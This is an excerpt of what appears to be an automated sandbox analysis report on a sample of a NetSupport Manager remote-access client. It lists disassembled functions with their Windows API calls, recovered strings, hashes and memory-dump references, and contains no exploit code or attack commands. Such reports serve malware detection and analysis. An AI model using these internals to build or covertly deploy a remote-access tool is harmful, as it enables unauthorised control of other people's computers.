                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: SleepWindows$CloseEnumHandle$CodeDirectoryExitMessageObjectProcessSendSingleWait__wcstoi64_memsetwsprintf
                                                                                      • String ID: "%sNSMExec.exe" %s$*ExitMetroDelay$Client$No new explorer wnd$\Explorer.exe$close new explorer wnd x%x
                                                                                      • API String ID: 3887438110-1852639040
                                                                                      • Opcode ID: dd4de2a7fc9d8cd5af608a89b0c8565785138ad2200bde7dfaaacefb5c936fd0
                                                                                      • Instruction ID: 68f8b224c7beedd47666692ff363fa6bc3684c9dbb57027410f782db2506f70a
                                                                                      • Opcode Fuzzy Hash: dd4de2a7fc9d8cd5af608a89b0c8565785138ad2200bde7dfaaacefb5c936fd0
                                                                                      • Instruction Fuzzy Hash: 3391D0B5E002299FDB14CF64DC80BEEF7F5AF89308F1441A9D9599B640EB30AE45CB91
                                                                                      Function 1102310A Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 363windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 1115ADD0: IsIconic.USER32(?), ref: 1115AE77
                                                                                        • Part of subcall function 1115ADD0: ShowWindow.USER32(?,00000009), ref: 1115AE87
                                                                                        • Part of subcall function 1115ADD0: BringWindowToTop.USER32(?), ref: 1115AE91
                                                                                      • CheckMenuItem.USER32(00000000,000013EB,-00000009), ref: 1102324D
                                                                                      • ShowWindow.USER32(?,00000003), ref: 110232D1
                                                                                      • LoadMenuA.USER32(00000000,000013A3), ref: 110233FB
                                                                                      • GetSubMenu.USER32(00000000,00000000), ref: 11023409
                                                                                      • CheckMenuItem.USER32(00000000,000013EB,?), ref: 11023429
                                                                                      • GetDlgItem.USER32(?,000013B2), ref: 1102343C
                                                                                      • GetWindowRect.USER32(00000000), ref: 11023443
                                                                                      • PostMessageA.USER32(?,00000111,?,00000000), ref: 11023499
                                                                                      • DestroyMenu.USER32(?,?,00000000,00000000,00000102,?,?,?,00000000), ref: 110234A3
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Menu$Window$Item$CheckShow$BringDestroyIconicLoadMessagePostRect
                                                                                      • String ID: AddToJournal$Chat
                                                                                      • API String ID: 693070851-2976406578
                                                                                      • Opcode ID: d2fe2766ddb3d34030bb972f012e30f748b4f8edd59272365cd546290ab4e6ab
                                                                                      • Instruction ID: 337dba7d0f02a97e7c7211def3ec221287211942730252afe18814347e7ecccc
                                                                                      • Opcode Fuzzy Hash: d2fe2766ddb3d34030bb972f012e30f748b4f8edd59272365cd546290ab4e6ab
                                                                                      • Instruction Fuzzy Hash: 87A1F178B04616ABDB09DF74CC85FAEB3E5AB88704F504519EA26DF2C0CF74B9408B65
                                                                                      Function 11105340 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 84fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetTickCount.KERNEL32 ref: 1110534D
                                                                                      • EnterCriticalSection.KERNEL32(111F060C,?,00000000,?,?,1114D6ED,?,1118C583,?,1118C583,000000FF,?,1114DAFB), ref: 11105356
                                                                                      • GetTickCount.KERNEL32 ref: 1110535C
                                                                                      • GetTickCount.KERNEL32 ref: 1110538E
                                                                                      • LeaveCriticalSection.KERNEL32(111F060C,?,00000000,?,?,1114D6ED,?,1118C583,?,1118C583,000000FF,?,1114DAFB), ref: 11105397
                                                                                      • EnterCriticalSection.KERNEL32(?,?,00000000,?,?,1114D6ED,?,1118C583,?,1118C583,000000FF,?,1114DAFB), ref: 111053B8
                                                                                      • WriteFile.KERNEL32(00000000,1118C583,?,?,00000000,?,00000000,?,?,1114D6ED,?,1118C583,?,1118C583,000000FF), ref: 111053D0
                                                                                      • LeaveCriticalSection.KERNEL32(?,?,00000000,?,?,1114D6ED,?,1118C583,?,1118C583,000000FF,?,1114DAFB), ref: 111053DD
                                                                                      • GetTickCount.KERNEL32 ref: 111053EC
                                                                                      • LeaveCriticalSection.KERNEL32(111F060C,?,00000000,?,?,1114D6ED,?,1118C583,?,1118C583,000000FF,?,1114DAFB), ref: 111053F5
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CriticalSection$CountTick$Leave$Enter$FileWrite
                                                                                      • String ID: Warning. simap lock held for %d ms$Warning. took %d ms to get simap lock
                                                                                      • API String ID: 831250470-625438208
                                                                                      • Opcode ID: 7549535bd9f32612e90d0c37b89a6aa1a9d576740b26f55eee6ebfb36c9c683f
                                                                                      • Instruction ID: 510883743b079e8f18b7a04972f4ca77f6f871929db96d85a9feff413df15827
                                                                                      • Opcode Fuzzy Hash: 7549535bd9f32612e90d0c37b89a6aa1a9d576740b26f55eee6ebfb36c9c683f
                                                                                      • Instruction Fuzzy Hash: F521F37AE10228ABDB009F759CC89AEFBADEB8972DB551075FC15CB204D6609C04CBA0
                                                                                      Function 11137340 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 74libraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetVersion.KERNEL32(00000000,74DF0BD0,00000000), ref: 11137363
                                                                                      • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 11137384
                                                                                      • GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 11137394
                                                                                      • GetModuleHandleA.KERNEL32(KERNEL32.DLL), ref: 111373B1
                                                                                      • GetProcAddress.KERNEL32(00000000,VerifyVersionInfoA), ref: 111373BD
                                                                                      • _memset.LIBCMT ref: 111373D7
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AddressHandleModuleProc$Version_memset
                                                                                      • String ID: KERNEL32.DLL$Terminal Server$VerSetConditionMask$VerifyVersionInfoA$ntdll.dll
                                                                                      • API String ID: 1659045089-3162170060
                                                                                      • Opcode ID: 2782e45080b00d7644363843fb4dac8f82773bfcd6b8b8724ba95a014df5fc97
                                                                                      • Instruction ID: 0c0b10a14524f440857339b23279ac9494b8b75ce88d62c7832b422cfd240681
                                                                                      • Opcode Fuzzy Hash: 2782e45080b00d7644363843fb4dac8f82773bfcd6b8b8724ba95a014df5fc97
                                                                                      • Instruction Fuzzy Hash: CB216A70F10329ABF720AB71AD44F5AFFA99B8871AF000474E914A7189EA71B9048765
                                                                                      Function 110390F0 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 225COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetDlgItem.USER32(?,00000001), ref: 1103910C
                                                                                      • IsWindowEnabled.USER32(00000000), ref: 11039113
                                                                                      • _memset.LIBCMT ref: 11039131
                                                                                      • GetDlgItemTextA.USER32(?,0000044D,?,00000080), ref: 11039183
                                                                                      • GetDlgItemTextA.USER32(?,0000044F,00000000,00000080), ref: 110391EB
                                                                                      • GetDlgItemTextA.USER32(?,000004BE,00000000,00000080), ref: 1103924E
                                                                                      • GetDlgItemTextA.USER32(?,000017EC,00000000,00000080), ref: 110392B1
                                                                                      • GetDlgItemTextA.USER32(?,0000048E,00000000,00000080), ref: 11039377
                                                                                      • GetDlgItemTextA.USER32(?,0000048D,00000000,00000080), ref: 11039314
                                                                                        • Part of subcall function 11142800: _strncpy.LIBCMT ref: 11142824
                                                                                        • Part of subcall function 11142290: _strncpy.LIBCMT ref: 111422D2
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Item$Text$_strncpy$EnabledWindow_memset
                                                                                      • String ID:
                                                                                      • API String ID: 3085755443-3916222277
                                                                                      • Opcode ID: 3474633675772f1dfa7fa715227e202affa5940b04f40e4fcdf8bfab1e55feb6
                                                                                      • Instruction ID: 27c08bceae7d385fa57d2e1d5dbc2d5db1b5a631922e4fecc43e69d3347e8bff
                                                                                      • Opcode Fuzzy Hash: 3474633675772f1dfa7fa715227e202affa5940b04f40e4fcdf8bfab1e55feb6
                                                                                      • Instruction Fuzzy Hash: 6D819F75A10706ABE724DB74CC85F9AB3F9BF84704F50C598E2499B181DF71FA448BA0
                                                                                      Function 1106F060 Relevance: 16.8, APIs: 3, Strings: 8, Instructions: 297COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • wsprintfA.USER32 ref: 1106F397
                                                                                      • EnterCriticalSection.KERNEL32(?,?,?,?,?,?), ref: 1106F3E8
                                                                                      • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?), ref: 1106F408
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CriticalSection$EnterLeavewsprintf
                                                                                      • String ID: %s:%d$(null)$ListenPort$NameResp from %s(%s), len=%d/%d, flags=%d, channel=%s$Port$TCPIP$UseNCS$tracerecv
                                                                                      • API String ID: 3005300677-3496508882
                                                                                      • Opcode ID: 813a8df51b421849a73fb34c3018abb507ddb1008c2509d1f87bc1f88576a655
                                                                                      • Instruction ID: 2680b2d19a9bdf8eb0956d8c99ae1cac6e929f7b4449284ea49473897193c40b
                                                                                      • Opcode Fuzzy Hash: 813a8df51b421849a73fb34c3018abb507ddb1008c2509d1f87bc1f88576a655
                                                                                      • Instruction Fuzzy Hash: 9EB1A375E0022A9FDB14DF65CC50FAAB7B9AF49708F4041DCE909A7241EB71A981CF62
                                                                                      Function 11047160 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 330windowtimeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • IsWindow.USER32(?), ref: 11047211
                                                                                      • _malloc.LIBCMT ref: 110472AD
                                                                                      • _memmove.LIBCMT ref: 11047312
                                                                                      • SendMessageTimeoutA.USER32(?,0000004A,00030496,00000005,00000002,00002710,?), ref: 11047372
                                                                                      • _free.LIBCMT ref: 11047379
                                                                                        • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                        • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                        • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                        • Part of subcall function 11043870: _free.LIBCMT ref: 11043907
                                                                                        • Part of subcall function 11043870: _free.LIBCMT ref: 11043927
                                                                                        • Part of subcall function 11043870: _strncpy.LIBCMT ref: 11043955
                                                                                        • Part of subcall function 11043870: _strncpy.LIBCMT ref: 11043992
                                                                                        • Part of subcall function 11043870: _malloc.LIBCMT ref: 110439CC
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _free$Message_malloc_strncpy$ErrorExitLastProcessSendTimeoutWindow_memmovewsprintf
                                                                                      • String ID: IsA()$SurveyResults$e:\nsmsrc\nsm\1210\1210f\ctl32\DataStream.h
                                                                                      • API String ID: 3960737985-1318765656
                                                                                      • Opcode ID: 6f3482f183dc71e32b0e781e0e1ae71b2587e219f1bd543c2aaaf4bdd4110b9c
                                                                                      • Instruction ID: e7dd2455d00588b8b0596ee18c4208b20e6f9302996f578dcf6f33cfb97cf12a
                                                                                      • Opcode Fuzzy Hash: 6f3482f183dc71e32b0e781e0e1ae71b2587e219f1bd543c2aaaf4bdd4110b9c
                                                                                      • Instruction Fuzzy Hash: 18C1A374E0064A9FDB04DFE4C8D0EEEF7B5BF88308F208168D519AB295DB70A945CB90
                                                                                      Function 1102D1A0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 156COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • std::_Xinvalid_argument.LIBCPMT ref: 1102D1C0
                                                                                        • Part of subcall function 111603E3: std::exception::exception.LIBCMT ref: 111603F8
                                                                                        • Part of subcall function 111603E3: __CxxThrowException@8.LIBCMT ref: 1116040D
                                                                                        • Part of subcall function 111603E3: std::exception::exception.LIBCMT ref: 1116041E
                                                                                      • _memmove.LIBCMT ref: 1102D24A
                                                                                      • _memmove.LIBCMT ref: 1102D26E
                                                                                      • _memmove.LIBCMT ref: 1102D2A8
                                                                                      • _memmove.LIBCMT ref: 1102D2C4
                                                                                      • std::exception::exception.LIBCMT ref: 1102D30E
                                                                                      • __CxxThrowException@8.LIBCMT ref: 1102D323
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _memmove$std::exception::exception$Exception@8Throw$Xinvalid_argumentstd::_
                                                                                      • String ID: deque<T> too long
                                                                                      • API String ID: 827257264-309773918
                                                                                      • Opcode ID: 6f44853749167e6417c702704c1d5fd1f6b6aa11f4fe1b268de19c2d7f3316e5
                                                                                      • Instruction ID: ae58a47b93f5c67beecf59276473b3909c5d487f19c470db74dff325715f4f31
                                                                                      • Opcode Fuzzy Hash: 6f44853749167e6417c702704c1d5fd1f6b6aa11f4fe1b268de19c2d7f3316e5
                                                                                      • Instruction Fuzzy Hash: DD41A476E00105ABDB04CE68CC81AEEB7FAAF94324F59C669DC09DB344E675EE05C790
                                                                                      Function 11005190 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 104windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetMenuItemCount.USER32(?), ref: 1100519E
                                                                                      • _memset.LIBCMT ref: 110051C0
                                                                                      • GetMenuItemID.USER32(?,00000000), ref: 110051D4
                                                                                      • CheckMenuItem.USER32(?,00000000,00000000), ref: 11005231
                                                                                      • EnableMenuItem.USER32(?,00000000,00000000), ref: 11005247
                                                                                      • GetMenuItemInfoA.USER32(?,00000000,00000001,00000030), ref: 11005268
                                                                                      • SetMenuItemInfoA.USER32(?,00000000,00000001,00000030), ref: 11005294
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ItemMenu$Info$CheckCountEnable_memset
                                                                                      • String ID: 0
                                                                                      • API String ID: 2755257978-4108050209
                                                                                      • Opcode ID: ed19a4d0eac54c607b6a919a5e70af2297959f222d84ccf27589c69c777b0ba6
                                                                                      • Instruction ID: ff6163613c0a8cbc830ef1528835912891ededd95cc8b4eaa22ca2fcf9c2cdf5
                                                                                      • Opcode Fuzzy Hash: ed19a4d0eac54c607b6a919a5e70af2297959f222d84ccf27589c69c777b0ba6
                                                                                      • Instruction Fuzzy Hash: 71318E70D11219ABEB01DFA4D885BEEBBFCEF46758F008059F951E6240E7759944CB60
                                                                                      Function 1101D1B0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 100registryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • _memset.LIBCMT ref: 1101D1E0
                                                                                      • GetClassInfoExA.USER32(00000000,NSMChatSizeWnd,?), ref: 1101D1FA
                                                                                      • _memset.LIBCMT ref: 1101D20A
                                                                                      • RegisterClassExA.USER32(?), ref: 1101D24B
                                                                                      • CreateWindowExA.USER32(00000000,NSMChatSizeWnd,11194244,00CF0000,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 1101D27E
                                                                                      • GetWindowRect.USER32(00000000,?), ref: 1101D28B
                                                                                      • DestroyWindow.USER32(00000000), ref: 1101D292
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
